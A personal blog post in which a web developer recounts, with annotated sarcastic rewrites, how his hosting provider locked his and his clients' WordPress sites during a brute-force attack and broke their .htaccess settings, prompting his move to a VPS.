Your feedback is crucial for our business to move forward. We are still that strong company with quality and products as we continue to invest more into support and service in terms of training and technology.
Do not hesitate to use my direct line (her number) or 24/7 technical support (their number) or simply reply to this email: [email protected].

Thank you for choosing myhosting.com, I hope we can get your positive tweets shorty.

Sincerely,

CS Rep

My world at work is customer service.  So I am always willing to respond so that if they’re actually willing to improve their service they can.  Here is my response.

Hi Olga,

Let me start off by saying at this point I will be leaving myHosting.  I have invested in outside hosting, at best I will retain my myHosting account for exchange email purposes.  That said as someone who works for a company that strives on customer service I’m going to lay out from beginning to end and my perspective on it.

Last month I had regular service issues despite my use of the CloudFlare CDN. I opened ticket #: FNF-528-19240

After multiple back and forth arguments about whether or not my site was hosted with myHosting finally they just blamed CloudFlare, the problem continued but with less frequency.  I just dealt with it.  For the most part the site would immediately come back on a refresh and none of my customers were noticing an issue or reporting one to me.

Then in the midst of this WordPress attack, I started to have issues a little more frequently. I started to get emails from my Customers and I did what I could on my end to fix the issue.  Then it happened, I and all my customers, 4 total, were locked out of their sites.  We were locked out without any email in my inbox of how to fix the issue.  When the solution did arrive after my promptly emailing support it was a solution that none of my 4 customers could implement, much less be feasible for 2 of them.  Despite my efforts in maintaining a secure WordPress site, including plugins to stop the brute force attacks, my site was rendered unusable not just to me, but my customers.  I actually had to disabled Cloudflare thus increasing my exposure to SPAM and other undesirable traffic.

Just so I am perfectly clear.  The actions of myHosting taken to “secure” the websites for which I am responsible resulted in their inability to function for my customers.  It took me at least 12 hours before I could finally get those sites unlocked for my customers.  During this time my ability to handle issues as well as my general perception to my customers was degraded.  Doubly so since while trying to unlock 2 of the site resulted in 500 internal server errors.  Once that error was corrected, cleanURLs was broken due to other changes to the .htaccess files by myHosting.  Instead of just correcting their errors to the files, they dumped them. This made me look like an idiot again when a customer informed me in the morning he was getting 404 errors.

That night I started the migration to a VPS with another company.  I could not trust that myHosting, even in a VPS, would not mess with my files or otherwise cause me issues and heartache.

I will say the shining spot in this entire mess was it appeared that I dealt with one single support representative.  That is ownership and honestly that is what I like to see.  But here is his last email, Don’t blame him though, he was trying to keep the peace and convey your situation. It is a lesson in needing to be seriously empathetic to customers and the effects of your actions as a provider.

Hello Barron,

Thank you for your patience and we are sorry that you are having an unhappy experience with myhosting.com.

Because 90% of our customers are not using Cloudflare for protection or wordpress plugins to stop unwanted access, we implemented this access restrict.
Because you appear to have a very secure webspace, you would most likely to be safe removing the lines that have been added, but this makes your wordpress website vulnerable to this attack, so please proceed with caution and make sure all wordpress user passwords are complex and secure.

We have disabled the .htaccess files on those two websites and they appear to be loading currently. If you would like, remove all the added code and turn your cloudflare back on.

Please let it be known we are trying to protect our customers the best possible way. Because of the urgency of the matter, this was the quickest solution. We hope this does not ruin your experience with myhosting.com.
http://statusblog.myhosting.com/
http://statusblog.myhosting.com/#oncloud

Regards,

Here’s how I read it:

Your Text.
My Corrections in Phrasing.
My mental commentary while reading.

Hello Barron,

Thank you for your patience and we are sorry that you are having an unhappy experience with myhosting.com. Because evidently the idea someone would be unhappy about being locked out of their own website surprises us.

Because 90% of our customers are not using Cloudflare for protection or wordpress plugins to stop unwanted access, we implemented this access restrictdecided to treat all our users like idiotic children that know nothing about anything.  Luckily I have experience with being penalized because of the actions of others.

Because you appear to have a very secure webspaceactually know what the fuck you’re doing and have previously educated our support staff, you would most likely to be safe removing the lines that have been added, but this makes your wordpress website vulnerable to this attacka brute force attack where they just randomly try passwords, so please proceed with caution and make sure all wordpress user passwords are complex and secure.  Why in the name of god do you think I use keypass and generate 20 character password strings, just for the ease in memorization?

We have disabled the .htaccess files on those two websites and they appear to be loading currentlybut we broke clean URLs so they’re still not working right, our bad? If you would like, remove all the added code and turn your cloudflare back on.  You mean I can unfuck my websites if I so choose!?  Here I thought you guys were just out to screw me in front of people I support.  And yes I unfucked every one I could as fast as I could, even before I got your permission!

Please let it be known we are trying to protect our customers the best possible way, by nuking the site from orbit by treating our customers like children and blocking their access to their own sites just the same as the attackers. Because of the urgency of the matter, this was the quickest solution, because we were dumb and too lazy to implement deep packet inspection and notice that the brute force attempts always use the same username, admin. We hope this does not ruinare sorry this has completely ruined your experience with myhosting.com.  We didn’t consider the ramifications of how our actions could possible make our customers look in the eyes of their own clients.  We will think about possibly not treating all our customers like children in the future but don’t count on it.
http://statusblog.myhosting.com/
http://statusblog.myhosting.com/#oncloud

Regards,

The same support guy I’ve been dealing with all day. +1 for that.

And yes, this did go up on my blog, this email will be going up as well.  I want you to understand exactly how badly this has cut into me.  I strive myself on customer service and whenever possible I stop what I’m doing to help when there is an issue.  Even when these people do not pay me a dime for my services.  I get an email at 0400 in the morning and if my phone actually wakes me up I will look and go fix the problem.  I take my wife out to dinner and get a text message that the server is down and I spend the rest of dinner cranking away on my phone to fix the problem.  That is customer service, owning the problem and fixing it.  Most definitely you do NOT create problems for the customer and if you do, you fix them 100% and ensure the site is returned to normal.  You do everything you can for that customer to ensure the problem is fixed immediately and any issues created are taken care of or assisted with to the best of your ability.

You must also remember when you do go and do something like that, it has consequences beyond just your visible customer level.  Your customers have customers.  Some have business and those types of actions cost them money and trust.  In this case myHosting caused a question regarding my integrity with my ability to be a provider for website services.  Integrity once lost can never be regained and I find the actions of myHosting down right deplorable given their impact on me, my business, and my customers.

If you have any other questions feel free to ask.

Sincerely,

Barron Barnett

I’m not holding out for another response back, but I figured I’d give them honest feedback. I will say I was kind of happy to get the kick in the ass to go get a VPS.